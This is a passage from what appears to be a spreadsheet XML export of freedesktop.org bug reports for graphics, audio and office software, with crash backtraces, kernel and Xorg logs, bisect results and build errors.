2: /usr/lib/libdrm_intel.so.1 [0xbf2522]
3: /usr/lib/libdrm_intel.so.1(drm_intel_bo_unreference+0x16) [0xbee3e6]
4: /root/xf86-video-intel-2.7.0/src/.libs//intel_drv.so [0x6c0f8b]
5: X [0x8164a5a]
6: /usr/lib/xorg/modules/extensions//libextmod.so [0x1c2823]
7: X(ServerBitsFromGlyph+0x22a) [0x8095b0a]
8: X(AllocGlyphCursor+0x4cf) [0x807975f]
9: X(CreateRootCursor+0xe4) [0x8079854]
10: X(main+0x3ac) [0x806af3c]
11: /lib/libc.so.6(__libc_start_main+0xe0) [0x3010c0]
12: X(FontFileCompleteXLFD+0x1e5) [0x806a451]
Fatal server error:
Caught signal 11.  Server aborting
(II) UnloadModule: synaptics
(II) UnloadModule: kbd
(II) UnloadModule: mouse
5.Following the suggestion from Gordon I tried the patch mentioned in 
http://bugs.freedesktop.org/show_bug.cgi?id=21084  but it doesn't work.
Additional info:
       UMS works well.</t>
  </si>
  <si>
    <t>PIGLIT-32837</t>
  </si>
  <si>
    <t>piglit fbo-generatemipmap-formats fails on all drivers</t>
  </si>
  <si>
    <t>piglit: 02bd3d69ea68e587ae1a612ebf2d071daf3a4dbc
fbo-generatemip-formats now fails on all non-Mesa drivers but previously passed. The test now fails on NVIDIA ATI and Apple.</t>
  </si>
  <si>
    <t>DBUS-27227</t>
  </si>
  <si>
    <t>typo in policy.c:list_allow_user(): uses uid for group rule</t>
  </si>
  <si>
    <t>list_allow_user() prints uid (as debug output) when processing a group rule. It happens to print the correct value because dbus_uid_t and dbus_gid_t are of the same size but claiming it to be the uid confuses the user.</t>
  </si>
  <si>
    <t>sascha-web-bugs.freedesktop.org</t>
  </si>
  <si>
    <t>PULSEAUDIO-68283</t>
  </si>
  <si>
    <t>Bonjour requires ports to be specified in network-byte-order</t>
  </si>
  <si>
    <t>Created attachment 84255
Patch that uses htons to return ports in network byteorder
For DNS-SD (Bonjour) discovery all ports should be set in network byteorder instead of host byteorder. Without this all ports on little-endian systems (intel) are incorrect. Patch attached that uses htons() to return the port in network order.
Documentation: https://developer.apple.com/library/mac/documentation/networking/Reference/DNSServiceDiscovery_CRef/Reference/reference.html#//apple_ref/c/func/DNSServiceRegister</t>
  </si>
  <si>
    <t>thothonegan</t>
  </si>
  <si>
    <t>DRI-27667</t>
  </si>
  <si>
    <t>[945 bisected] Resume with VGA only causes flicker</t>
  </si>
  <si>
    <t xml:space="preserve">I upgraded from 2.6.33.2 to 2.6.34-rc3 and came across issue:
I run my notebook with the VGA output on and the LVDS output off. In this configuration after resume from disk or ram the VGA monitor will show gray when the computer is idle. The actual desktop will show if I move the mouse or if the computer is busy. If I VT switch tty's flicker too but black. (Text shows if I type if I stop it won't be there).
Back In X with xrandr If I switch the LVDS on at the same time it goes away. Also if I switch the LVDS on turn VGA off turn VGA on again then turn LVDS off all is okay too. All this is 100% reproducible.
Anholt asked me to bisect I got this:
ee980b8003a25fbfed50c3367f2b426c870eaf90 is the first bad commit
commit ee980b8003a25fbfed50c3367f2b426c870eaf90
Author: Li Peng 
Date:   Wed Jan 27 19:01:11 2010 +0800
    drm/i915: enable memory self refresh on 9xx
    Enabling memory self refresh (SR) on 9xx needs to set additional
    register bits. On 945 we need bit 31 of FW_BLC_SELF to enable the
    write to self refresh bit and bit 16 to enable the write of self
    refresh watermark. On 915 bit 12 of INSTPM is used to enable SR.
    SR will take effect when CPU enters C3+ state and its entry/exit
    should be automatically controlled by H/W driver only needs to set
    SR enable bits in wm update. But this isn't safe in my test on 945
    because GPU is hung. So this patch explicitly enables SR when GPU
    is idle and disables SR when it is busy. In my test on a netbook of
    945GSE chipset it saves about 0.8W idle power.
    Signed-off-by: Li Peng 
    [anholt: rebased against 33c5fd121eabbccc9103daf6cda36941eb3c349f
    by adding disable of INSTPM SR bit on 915GM for two pipe setup]
    Signed-off-by: Eric Anholt </t>
  </si>
  <si>
    <t>lambchop468</t>
  </si>
  <si>
    <t>SWFDEC-15860</t>
  </si>
  <si>
    <t>Flash movie crashes firefox</t>
  </si>
  <si>
    <t>Firefox 3.0b5 immediately crashes upon starting the flash player.</t>
  </si>
  <si>
    <t>eric225125</t>
  </si>
  <si>
    <t>XORG-32534</t>
  </si>
  <si>
    <t>[arrandale/sandybridge] i965 receiving stale flink name from DRI2</t>
  </si>
  <si>
    <t>Created attachment 41315
backtrace of Xorg. generated using gdb backtrace full
Hi
on my Thinkpad T510 with an Intel Core i7 X crashes nearly everytime after closing fullscreen flash windows (e.g. when switching fullscreen on youtube on and off). This happens only if compositing (using KWin) is enabled.
I am using gentoo with linux 2.6.37-rc6 (iirc 2.6.36 was affected too) mesa 7.9.0 (iirc 7.8.1 was affected too) and xf86-video-intel-2.13.0.
Let me know if you need further information. I can also follow instructions on irc and test patches.</t>
  </si>
  <si>
    <t>flyser42</t>
  </si>
  <si>
    <t>DRI-78943</t>
  </si>
  <si>
    <t>[BDW]igt/gem_exec_params/rel-constants-invalid-ring fails</t>
  </si>
  <si>
    <t>Created attachment 99386
dmesg
==System Environment==
--------------------------
Regression: No. 
This case always fails
Non-working platforms: BDW
==kernel==
--------------------------
-nightly: f79ba79cf037eea9ee757ad37730b00f43d5ef80 (works)
-queued: d3b448d9917a3d6531e499d88bfb13ea5e31e4ad (works)
    Author: Chris Wilson 
    Date:   Fri May 16 18:59:00 2014 +0100
    drm/i915: Only unpin the default ctx object if it exists
    Since commit 691e6415c891b8b2b082a120b896b443531c4d45
    Author: Chris Wilson 
    Date:   Wed Apr 9 09:07:36 2014 +0100
        drm/i915: Always use kref tracking for all contexts.
    we have contexts everywhere and so we must be careful to distinguish
    fake contexts which do not have an associated bo and real ones which
    do. In particular we now need to be careful not to dereference NULL
    pointers.
    This is one such example as the commit highlighted above failed to move
    the unpinning of the default ctx object into the real-context-only
    branch.
    Reported-by: Daniel Vetter 
    Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=78792
    Signed-off-by: Chris Wilson 
    Cc: Daniel Vetter 
    Cc: Ben Widawsky 
    Cc: Mika Kuoppala 
    Cc: Jani Nikula 
    Signed-off-by: Daniel Vetter 
-fixes: e95a2f7509f5219177d6821a0a8754f93892ca56 (fails)
    Author: Ville SyrjÃ¤lÃ¤ 
    Date:   Thu May 8 15:09:19 2014 +0300
    drm/i915: Increase WM memory latency values on SNB
    On SNB the BIOS provided WM memory latency values seem insufficient to
    handle high resolution displays.
    In this particular case the display mode was a 2560x1440@60Hz which
    makes the pixel clock 241.5 MHz. It was empirically found that a memory
    latency value if 1.2 usec is enough to avoid underruns whereas the BIOS
    provided value of 0.7 usec was clearly too low. Incidentally 1.2 usec
    is what the typical BIOS provided values are on IVB systems.
    Increase the WM memory latency values to at least 1.2 usec on SNB.
    Hopefully this won't have a significant effect on power consumption.
    v2: Increase the latency values regardless of the pixel clock
    Cc: Robert N 
    Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=70254
    Tested-by: Robert Navarro 
    Tested-by: Vitaly Minko 
    Cc: stable@vger.kernel.org
    Signed-off-by: Ville SyrjÃ¤lÃ¤ 
    Signed-off-by: Jani Nikula 
==Bug detailed description==
-----------------------------
igt/gem_exec_params/rel-constants-invalid-ring fails
This bug only occurs on -fixes branch
Output:
./gem_exec_params --run-subtest rel-constants-invalid-ring
IGT-Version: 1.6-gd71add5 (x86_64) (Linux: 3.15.0-rc3_drm-intel-fixes_e95a2f_20140520+ x86_64)
Test assertion failure function __real_main55 file gem_exec_params.c:132:
Last errno: 0 Success
Failed assertion: drmIoctl(fd DRM_IOCTL_I915_GEM_EXECBUFFER2 &amp;execbuf) == -1
Subtest rel-constants-invalid-ring: FAIL
==Reproduce steps==
---------------------------- 
1. ./gem_exec_params --run-subtest rel-constants-invalid-ring</t>
  </si>
  <si>
    <t>antti.koskipaa</t>
  </si>
  <si>
    <t>YTSTENUT-45804</t>
  </si>
  <si>
    <t>Update yts-plugins to match the telepathy-salut API changes</t>
  </si>
  <si>
    <t>telepathy-salut has a proposed patch similar to telepathy-gabble which separates plugin related code into  a separate library and Uses SalutPluginConnection instead of SalutConnection.</t>
  </si>
  <si>
    <t>POPPLER-102760</t>
  </si>
  <si>
    <t>pdftops generates crumbled text</t>
  </si>
  <si>
    <t>Created attachment 134244
screen shot from PDF screen
Attached are two screenshots one is the text of the PDF file the other is the text generated apparently using poppler by pdftops.
Most likely the bar code causes the trouble.
On request the PDF file can be made available but only to the developer.</t>
  </si>
  <si>
    <t>LIBREOFFICE-39337</t>
  </si>
  <si>
    <t>RTF document with table not displayed correctly</t>
  </si>
  <si>
    <t>I have an RTF document containing a table. The document opens fine in various MS Office 2003 and 2010 but in LibreOffice it is completely unreadable the entire table is collapsed to one line. I don't know if that's important but the RTF was generated by SAP (and AFAIR afterwards edited in Word 2010)</t>
  </si>
  <si>
    <t>flack</t>
  </si>
  <si>
    <t>CAIRO-5804</t>
  </si>
  <si>
    <t>SIGSEGV in fbFetch</t>
  </si>
  <si>
    <t>SEGV at fbFetch from fbCompositeRect in fbcompose.o from fbpict.o
This is similar to bug 4945 but without any remote issues.
Here's the relevant stack trace:
  [1] 0x0(0x203e790 0x0 0x17 0xffbe5910 0x0 0x0) at 0xffffffffffffffff 
=&gt;[2] fbFetch(pict = 0x203e918 x = 0 y = 23 width = -4302484 buffer =
(nil)) line 2673 in fbcompose.c
  [3] fbCompositeRect(data = 0x203e918 scanline_buffer = (nil)) line 3565 in
fbcompose.c
  [4] pixman_compositeGeneral(op = 33810712 pSrc = (nil) pMask = 0x17 pDst =
0xffbe596c xSrc = 0 ySrc = 0 xMask = 0 yMask = -25648 xDst = 0 yDst = 0
width = 0 height = 0) line 3677 in fbcompose.c
  [5] _cairo_pixman_composite(op = 33810712 pSrc = (nil) pMask = 0x17 pDst =
0xffbe596c xSrc = 0 ySrc = 0 xMask = 0 yMask = -40920112 xDst = 0 yDst =
0 width = 0 height = 0) line 1825 in fbpict.c
  [6] _cairo_image_surface_composite(operator = 33810712 src_pattern = (nil)
mask_pattern = 0x17 abstract_dst = 0xffbe596c src_x = 0 src_y = 0 mask_x =
0 mask_y = -40920112 dst_x = 0 dst_y = 0 width = 0 height = 0) line 614 in
cairo-image-surface.c
  [7] _fallback_composite(operator = 33810712 src = (nil) mask = 0x17 dst =
0xffbe596c src_x = 0 src_y = 0 mask_x = 0 mask_y = -40920112 dst_x = 0
dst_y = 0 width = 0 height = 0) line 805 in cairo-surface.c
  [8] _cairo_surface_composite(operator = 33810712 src = (nil) mask = 0x17
dst = 0xffbe596c src_x = 0 src_y = 0 mask_x = 0 mask_y = -40920112 dst_x =
0 dst_y = 0 width = 0 height = 0) line 856 in cairo-surface.c
  [9] _cairo_ft_scaled_font_show_glyphs(abstract_font = 0x203e918 operator =
CAIRO_OPERATOR_CLEAR pattern = 0x17 surface = 0xffbe596c source_x = 0
source_y = 0 dest_x = 0 dest_y = -40920112 width = 0 height = 0 glyphs =
(nil) num_glyphs = 0) line 2052 in cairo-ft-font.c
  [10] _cairo_scaled_font_show_glyphs(scaled_font = 0x203e918 operator =
CAIRO_OPERATOR_CLEAR pattern = 0x17 surface = 0xffbe596c source_x = 0
source_y = 0 dest_x = 0 dest_y = -40920112 width = 0 height = 0 glyphs =
(nil) num_glyphs = 0) line 945 in cairo-font.c
  [11] _cairo_gstate_show_glyphs_draw_func(closure = 0x203e918 operator =
CAIRO_OPERATOR_CLEAR src = 0x17 dst = 0xffbe596c dst_x = 0 dst_y = 0
extents = (nil)) line 2060 in cairo-gstate.c
  [12] _cairo_gstate_clip_and_composite(clip = 0x203e918 operator =
CAIRO_OPERATOR_CLEAR src = 0x17 draw_func = 0xffbe596c draw_closure = (nil)
dst = (nil) extents = (nil)) line 1097 in cairo-gstate.c
  [13] _cairo_gstate_show_glyphs(gstate = 0x203e918 glyphs = (nil) num_glyphs
= 23) line 2135 in cairo-gstate.c
  [14] cairo_show_glyphs(cr = 0x203e918 glyphs = (nil) num_glyphs = 23) line
2158 in cairo.c
  [15] pango_cairo_renderer_draw_glyphs(0x203df80 0x2036300 0x1fae4c0 0x0
0x0 0x0) at 0xfdb63f98</t>
  </si>
  <si>
    <t>saurabh</t>
  </si>
  <si>
    <t>LIBREOFFICE-63227</t>
  </si>
  <si>
    <t>LOCALIZATION not used for print dialog window header</t>
  </si>
  <si>
    <t>Created attachment 77552
Screenshots
Observations of Christian KÃ¼hl and others on German mailing list are  [Reproducible] with server installation of LibO  4.0.2.2 rc   -  German UI / German Locale  [Build ID: 4c82dcdd6efcd48b1d8bba66bfe1989deee49c3)]  {tinderbox: @6 pull time  2013-03-26 12:00(?)} on German WIN7 Home Premium (64bit) with newly created own user profile same with Italian French Spanish UI:
Heading of print dialog shows print instead of Drucken ...
In 4.0.1 The heading was completely missing in 4.0.2 the English word is used instead of translations
@AndrÃ¡s:
Your turf?</t>
  </si>
  <si>
    <t>XORG-26343</t>
  </si>
  <si>
    <t>xf86-video-sunbw2 can't build needs xf86Version.h</t>
  </si>
  <si>
    <t>xf86-video-sunbw2 can't possibly build at present - it needs xf86Version.h which was removed 2008-08-15 with commit 544bfd06663ff71bc5275459cf74a3557530544 - it's possible anyone still running such a machine hasn't tried putting a recent Xorg on it.
Resolution: either declare this driver dead and remove it or fix it up.
The driver has already been removed from Ubuntu and Debian:
https://bugs.edge.launchpad.net/ubuntu/+source/xserver-xorg-video-sunbw2/+bug/314539</t>
  </si>
  <si>
    <t>dgerard</t>
  </si>
  <si>
    <t>DRI-105632</t>
  </si>
  <si>
    <t>X won't start at drm/amd/pp: Simplified the avfs btc state on smu7</t>
  </si>
  <si>
    <t>X won't start at drm/amd/pp: Simplified the avfs btc state on smu7 on drm-next-4.17.
https://cgit.freedesktop.org/~agd5f/linux/commit/?h=drm-next-4.17&amp;id=116af45059139e8a156c9993bc4aa94625bd9c5e
Odd I thought I remember X starting with commit amdgpu/dm: Default PRE_VEGA ASIC support to 'y' on the the drm-next-4.17-wip branch and that commit is AFTER drm/amd/pp: Simplified the avfs btc state on smu7 on branch drm-next-4.17.</t>
  </si>
  <si>
    <t>LIBREOFFICE-32584</t>
  </si>
  <si>
    <t>F~ormel in menu instead of Formel</t>
  </si>
  <si>
    <t>When the start center is closed Math has a wrong translation in the file menu the mnemonic is visible. Instead of Datei | Formel it is Datei | F~ormel. Only visible when start center is closed and thus the reduced menu is visible. Applies to RC2.
Maybe checking for Windows quickstarter entry makes sense too.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-100515</t>
  </si>
  <si>
    <t>Account creation with the drm-misc group permission</t>
  </si>
  <si>
    <t>Created attachment 130619
rsa_pub_key
I am requesting an account with drm-misc group permission to contribute to drm-misc with drm sti driver.
Name: Vincent Abriou
Email: vincent.abriou@st.com
Account name: vinceab</t>
  </si>
  <si>
    <t>vincent.abriou</t>
  </si>
  <si>
    <t>XORG-5701</t>
  </si>
  <si>
    <t>hw/xfree86/Makefile does not make Xorg depend on XORG_LIBS</t>
  </si>
  <si>
    <t>Hi
I noticed that in the xorg-server package hw/xfree86/Makefile (which is
autogenerated from hw/xfree86/Makefile.am) does not make the Xorg binary depend
on the objects referred to as XORG_LIBS (even though they are included in the
Xorg_LDADD variable).
This makes debugging harder as Xorg isn't rebuilt automatically by make in cases
where it should be.</t>
  </si>
  <si>
    <t>prumpf</t>
  </si>
  <si>
    <t>DBUS-16841</t>
  </si>
  <si>
    <t>Patches to allow NULL timeout for pending call</t>
  </si>
  <si>
    <t xml:space="preserve">Created attachment 17862
[PATCH 1/9] Make sure a pending call timeout isn't assumed.
From: Scott James Remnant </t>
  </si>
  <si>
    <t>LIBREOFFICE-79547</t>
  </si>
  <si>
    <t>FILEOPEN: DOCX TOC numbering loses spacing between number and text</t>
  </si>
  <si>
    <t>Created attachment 100307
Bugdoc made with Word 2010
Attached file was made with Word 2010 and there was some spacing between the number and the text of the TOC items which is lost in Writer 4.2.x.</t>
  </si>
  <si>
    <t>XORG-66534</t>
  </si>
  <si>
    <t>Clickpad's should ignore thumbs preparing for and engaging in a click</t>
  </si>
  <si>
    <t xml:space="preserve">Related to my #66532 but this one is probably the correct solution to my problem.
If I am holding down the button with my thumb to initiate a drag and I move my finger across the clickpad a scroll event is generated because of the two touch points.
Similarly if I am preparing for a click and have my thumb resting on the clickpad it should not be seen as a second touch.
This can be an option for Clickpads enabled like:
Option IgnoreThumb 
or
Option IgnoreThumbArea    </t>
  </si>
  <si>
    <t>MESA-10501</t>
  </si>
  <si>
    <t>Screen is corrupted running compiz</t>
  </si>
  <si>
    <t>Hi all
I just installed compiz on an ATI 7200 following the instruction I've got from compiz site if I enable it via the GL desktop preference my screen is corrupted.</t>
  </si>
  <si>
    <t>paolo.ciarrocchi</t>
  </si>
  <si>
    <t>MESA-29722</t>
  </si>
  <si>
    <t>[glsl] Unigine Sanctuary v2.2 assertion failed</t>
  </si>
  <si>
    <t>After recent glsl2 merge Unigine Sanctuary asserts on start. This is with r300g driver RV530 Kernel 2.6.35 and latest mesa git.
Sanctuary: ir_variable.cpp:84: void add_builtin_variable(const builtin_variable* exec_list* glsl_symbol_table*): Assertion `type != __null' failed.
Program received signal SIGABRT Aborted.
0xb7fff424 in __kernel_vsyscall ()
Missing separate debuginfos use: debuginfo-install openal-soft-1.12.854-1.fc13.i686
(gdb) bt full
#0  0xb7fff424 in __kernel_vsyscall ()
No symbol table info available.
#1  0x476aad11 in raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
        resultvar = 
        resultvar = 
        pid = 1199603700
        selftid = 17428
#2  0x476ac5ea in abort () at abort.c:92
        save_stage = 2
        act = {__sigaction_handler = {sa_handler = 0x478093a0  
            sa_sigaction = 0x478093a0 } sa_mask = {__val = {
              1199603700 160 1 3221174432 3221174220 0 304 151 
              1199608736 1199603700 151 150 3221174392 1198422242 
              140685016 151 3221174432 140684912 0 4222451712 140685016 
              140685117 140685016 140685016 140685166 140685316 
              140685016 140685316 0 0 0 0}} sa_flags = 0 
          sa_restorer = 0x2}
        sigs = {__val = {32 0 }}
#3  0x476a3d98 in __assert_fail (assertion=0xb7251c24 type != __null 
    file=0xb72c45ef ir_variable.cpp line=84 
    function=0xb72c4900 void add_builtin_variable(const builtin_variable* exec_list* glsl_symbol_table*)) at assert.c:81
        buf = 0x862aed8 Sanctuary: ir_variable.cpp:84: void add_builtin_variabl
e(const builtin_variable* exec_list* glsl_symbol_table*): Assertion `type != __null' failed.\n
#4  0xb70f2e77 in add_builtin_variable (proto=0xb72eea20 
    instructions= symtab=0x860a568) at ir_variable.cpp:84
        type = 0x4414
        __PRETTY_FUNCTION__ = void add_builtin_variable(const builtin_variable* exec_list* glsl_symbol_table*)
#5  0xb70f355f in generate_110_vs_variables (instructions=0x862ae60 
    state=0x862a4a8) at ir_variable.cpp:199
        i = 0
        vec4_array_type = 
#6  0xb70c5cc6 in _mesa_ast_to_hir (instructions=0x862ae60 state=0x862a4a8)
    at ast_to_hir.cpp:63
No locals.
#7  0xb70bce6f in _mesa_glsl_compile_shader (ctx=0x81bb918 shader=0x860a4b0)
    at program/ir_to_mesa.cpp:2666
        state = 0x862a4a8
        source = 0x863ef68 uniform vec4 s_viewport\nuniform vec4 s_depth_range\nuniform vec4 s_solid_color\nuniform vec4 s_ambient_color\nuniform mat4 s_projection\nuniform mat4 s_modelview\nuniform mat4 s_modelviewprojection\n...
#8  0xb705cf91 in compile_shader (ctx=0x81bb918 shaderObj=1)
    at main/shaderapi.c:803
        sh = 0x860a4b0
#9  0xb705d7a4 in _mesa_CompileShaderARB (shaderObj=1) at main/shaderapi.c:1091
        ctx = 0x81bb918
#10 0x44d3f92b in glCompileShaderARB (shader=1)
    at ../../src/mesa/glapi/glapitemp.h:3472
No locals.
#11 0xb7ca082d in GLShader::loadVertex(char const* char const*) ()
   from ./libUnigine_x86.so
No symbol table info available.
#12 0xb7bbe720 in Material::create_shader(Material::MShader*) ()
   from ./libUnigine_x86.so
No symbol table info available.
#13 0xb7bbea16 in Material::get_shader(Material::MShader*) ()
   from ./libUnigine_x86.so
No symbol table info available.
#14 0xb7bbeb35 in Material::get_shader(int int Material const*) ()
   from ./libUnigine_x86.so
No symbol table info available.
#15 0xb7bbebc8 in Material::getShader(int int) () from ./libUnigine_x86.so
No symbol table info available.
#16 0xb7bc65b4 in MaterialManager::warmShaders() () from ./libUnigine_x86.so
No symbol table info available.
#17 0xb7a2fd37 in World::loadWorld(char const*) () from ./libUnigine_x86.so
No symbol table info available.
#18 0xb7a30185 in World::world_load(int char**) () from ./libUnigine_x86.so
No symbol table info available.
#19 0xb7a31504 in ConsoleCommand_Args::operator()(int char** void*) const () from ./libUnigine_x86.so
No symbol table info available.
#20 0xb78fd3da in Console::update() () from ./libUnigine_x86.so
No symbol table info available.
#21 0xb77d314b in Engine::init(int char** char const* char const*) ()
   from ./libUnigine_x86.so
No symbol table info available.
#22 0xb77d36eb in Engine::Engine(int char** char const* char const*) ()
   from ./libUnigine_x86.so
No symbol table info available.
#23 0xb77e30a2 in Unigine::Engine::init(int int char** char const* char const*) () from ./libUnigine_x86.so
No symbol table info available.
#24 0x0804860b in ?? ()
No symbol table info available.
#25 0x47696cc6 in __libc_start_main (main=0x80485d4 argc=1 
    ubp_av=0xbffff324 init=0x8048640 fini=0x8048630 
    rtld_fini=0x4766d220  stack_end=0xbffff31c) at libc-start.c:226
        result = 
        unwind_buf = {cancel_jmp_buf = {{jmp_buf = {1199603700 0 0 
                -1073745160 456373363 906994562} mask_was_saved = 0}} 
          priv = {pad = {0x0 0x0 0x1 0x8048520} data = {prev = 0x0 
              cleanup = 0x0 canceltype = 1}}}
        not_first_call = 
#26 0x08048541 in ?? ()</t>
  </si>
  <si>
    <t>MESA-89616</t>
  </si>
  <si>
    <t>bufferobj.c:1639:7: error: format not a string literal and no format arguments [-Werror=format-security]</t>
  </si>
  <si>
    <t>Compile error on current mesa git:
https://launchpadlibrarian.net/200474799/buildlog_ubuntu-vivid-amd64.mesa_10.6~git1503171930.579297~gd~v_BUILDING.txt.gz</t>
  </si>
  <si>
    <t>DRI-99535</t>
  </si>
  <si>
    <t>GPU hangs</t>
  </si>
  <si>
    <t>Kernel: 4.9.4-1-default openSuse Tumbleweed
After resume from s2disk PC hangs screen flickers and desktop is unresponsive.
dmesg includes these lines after wakeup:
[22470.597775] [drm] GPU HANG: ecode 8:0:0xba399353 in Xorg [1652] reason: 
Hang on render ring action: reset
[22470.597778] [drm] GPU hangs can indicate a bug anywhere in the entire gfx 
stack including userspace.
[22470.597780] [drm] Please file a _new_ bug report on bugs.freedesktop.org 
against DRI -&gt; DRM/Intel
[22470.597781] [drm] drm/i915 developers can then reassign to the right 
component if it's not a kernel issue.
[22470.597782] [drm] The gpu crash dump is required to analyze gpu hangs so 
please always attach it.
[22470.597784] [drm] GPU crash dump saved to /sys/class/drm/card0/error
[22470.597865] drm/i915: Resetting chip after gpu hang
[22479.589147] drm/i915: Resetting chip after gpu hang
[22480.078992] Uhhuh. NMI received for unknown reason 3c on CPU 0.
[22480.078995] Do you have a strange power saving mode enabled?
[22480.078997] Dazed and confused but trying to continue
[22491.589009] drm/i915: Resetting chip after gpu hang
[22503.620918] drm/i915: Resetting chip after gpu hang
[22515.588830] drm/i915: Resetting chip after gpu hang
[22527.588757] drm/i915: Resetting chip after gpu hang
[22539.588682] drm/i915: Resetting chip after gpu hang
[22551.588603] drm/i915: Resetting chip after gpu hang
[22562.596511] drm/i915: Resetting chip after gpu hang
[22573.604415] drm/i915: Resetting chip after gpu hang
[22584.580419] drm/i915: Resetting chip after gpu hang
[22595.620296] drm/i915: Resetting chip after gpu hang
[22607.588250] drm/i915: Resetting chip after gpu hang
[22617.604150] drm/i915: Resetting chip after gpu hang
[22629.604064] drm/i915: Resetting chip after gpu hang
[22641.603976] drm/i915: Resetting chip after gpu hang
[22651.619902] drm/i915: Resetting chip after gpu hang
[22662.627872] drm/i915: Resetting chip after gpu hang
[22675.587746] drm/i915: Resetting chip after gpu hang
============================================
dmesg | grep error
[    9.446992] tpm tpm0: A TPM error (6) occurred attempting to read a pcr 
value
[    9.453848] iwlwifi 0000:03:00.0: Direct firmware load for 
iwlwifi-7265D-26.ucode failed with error -2
[    9.453861] iwlwifi 0000:03:00.0: Direct firmware load for 
iwlwifi-7265D-25.ucode failed with error -2
[    9.453869] iwlwifi 0000:03:00.0: Direct firmware load for 
iwlwifi-7265D-24.ucode failed with error -2
[    9.453876] iwlwifi 0000:03:00.0: Direct firmware load for 
iwlwifi-7265D-23.ucode failed with error -2
[21923.165360] tpm tpm0: A TPM error (6) occurred attempting to read a pcr 
value
[22456.293200] tpm tpm0: A TPM error (6) occurred attempting to read a pcr 
value
[22470.597784] [drm] GPU crash dump saved to /sys/class/drm/card0/error
linux-k2bd:/home/AW # dmesg | grep *ERROR*
[21923.880843] [drm:intel_dp_start_link_train [i915]] *ERROR* failed to enable 
link training
[21923.965787] [drm:intel_dp_start_link_train [i915]] *ERROR* failed to start 
channel equalization
[21930.417303] [drm:intel_cpu_fifo_underrun_irq_handler [i915]] *ERROR* CPU 
pipe B FIFO underrun</t>
  </si>
  <si>
    <t>cookie170</t>
  </si>
  <si>
    <t>XORG-52402</t>
  </si>
  <si>
    <t>xorg version 1.12.99.902 (1.13.0 RC 2) crashes with X: ../include/privates.h:123: dixGetPrivateAddr: Assertion `key-&gt;initialized' failed.</t>
  </si>
  <si>
    <t>Created attachment 64552
dmesg with drm info
after updating my Fedora Rawhide system this morning. X crashes with X: ../include/privates.h:123: dixGetPrivateAddr: Assertion `key-&gt;initialized' failed.
the following xorg components installed:
xorg-x11-fonts-misc-7.5-5.fc17.noarch
xorg-x11-xkb-utils-7.7-1.fc18.x86_64
xorg-x11-server-Xorg-1.12.99.902-1.20120717.fc18.x86_64
xorg-x11-apps-7.6-5.fc17.x86_64
xorg-x11-server-common-1.12.99.902-1.20120717.fc18.x86_64
xorg-x11-font-utils-7.5-8.fc18.x86_64
xorg-x11-utils-7.5-6.fc17.x86_64
xorg-x11-server-utils-7.5-12.fc18.x86_64
xorg-x11-resutils-7.5-3.fc17.x86_64
xorg-x11-drv-evdev-2.7.0-5.20120718gitf5ede9808.fc18.x86_64
xorg-x11-xauth-1.0.7-1.fc17.x86_64
xorg-x11-proto-devel-7.6-22.fc18.noarch
xorg-x11-fonts-Type1-7.5-5.fc17.noarch
xorg-x11-drv-nouveau-1.0.1-3.fc18.x86_64
xorg-x11-fonts-ISO8859-1-100dpi-7.5-5.fc17.noarch
xorg-x11-xinit-1.3.2-5.fc18.x86_64
server and server-common were updated today with yum and after a reboot I can get into X briefly but then X crashes and I see this in my startx log (so I'm going to have to backout those updates):
X: ../include/privates.h:123: dixGetPrivateAddr: Assertion `key-&gt;initialized' failed.
/var/log/Xorg.0.log looks like this:
[   165.361]
This is a pre-release version of the X server from Fedora Project.
It is not supported in any way.
Bugs may be filed in the bugzilla at http://bugs.freedesktop.org/.
Select the xorg product for bugs you find in this release.
Before reporting bugs in pre-release versions please check the
latest version in the X.Org Foundation git repository.
See http://wiki.x.org/wiki/GitPage for git access instructions.
[   165.361]
X.Org X Server 1.12.99.902 (1.13.0 RC 2)
Release Date: 2012-07-17
[   165.362] X Protocol Version 11 Revision 0
[   165.362] Build Operating System:  2.6.32-279.1.1.el6.x86_64
[   165.362] Current Operating System: Linux ktmtoshiba 3.4.0-0.rc7.git6.1.fc18.x86_64 #1 SMP Sun May 20 12:59:46 UTC 2012 x86_64
[   165.362] Kernel command line: BOOT_IMAGE=/vmlinuz-3.4.0-0.rc7.git6.1.fc18.x86_64 root=UUID=872f0158-7e7d-43f6-9916-5c833804656a
ro drm.debug=14 log_buf_len=16M SYSFONT=latarcyrheb-sun16 LANG=en_US.UTF-8 KEYTABLE=us nouveau.noaccel=1
[   165.363] Build Date: 18 July 2012  07:41:57AM
[   165.363] Build ID: xorg-x11-server 1.12.99.902-1.20120717.fc18
[   165.363] Current version of pixman: 0.26.2
[   165.363]    Before reporting problems check http://wiki.x.org
        to make sure that you have the latest version.
[   165.363] Markers: (--) probed (**) from config file (==) default setting
        (++) from command line (!!) notice (II) informational
        (WW) warning (EE) error (NI) not implemented (??) unknown.
[   165.364] (==) Log file: /var/log/Xorg.0.log Time: Mon Jul 23 09:36:04 2012
[   165.430] (==) Using system config directory /usr/share/X11/xorg.conf.d
[   165.443] (==) No Layout section.  Using the first Screen section.
[   165.443] (==) No screen section available. Using defaults.
[   165.443] (**) |--&gt;Screen Default Screen Section (0)
[   165.443] (**) |   |--&gt;Monitor 
[   165.444] (==) No monitor specified for screen Default Screen Section.
        Using a default monitor configuration.
[   165.445] (==) Automatically adding devices
[   165.445] (==) Automatically enabling devices
[   165.445] (==) Automatically adding GPU devices
[   165.454] (==) FontPath set to:
        catalogue:/etc/X11/fontpath.d
        built-ins
[   165.454] (==) ModulePath set to /usr/lib64/xorg/modules
[   165.454] (II) The server relies on udev to provide the list of input devices.
        If no devices become available reconfigure udev or disable AutoAddDevices.
[   165.454] (II) Loader magic: 0x83bcc0
[   165.454] (II) Module ABI versions:
[   165.454]    X.Org ANSI C Emulation: 0.4
[   165.454]    X.Org Video Driver: 13.0
[   165.455]    X.Org XInput driver : 18.0
[   165.455]    X.Org Server Extension : 6.0
[   165.463] (II) config/udev: Adding drm device (/dev/dri/card0)
[   165.469] (--) PCI:*(0:1:0:0) 10de:0cb1:1179:ff50 rev 162 Mem @ 0xcc000000/16777216 0xd0000000/268435456 0xce000000/33554432
I/O @ 0x00002000/128 BIOS @ 0x????????/524288
[   165.470] Initializing built-in extension Generic Event Extension
[   165.470] Initializing built-in extension SHAPE
[   165.470] Initializing built-in extension MIT-SHM
[   165.470] Initializing built-in extension XInputExtension
[   165.470] Initializing built-in extension XTEST
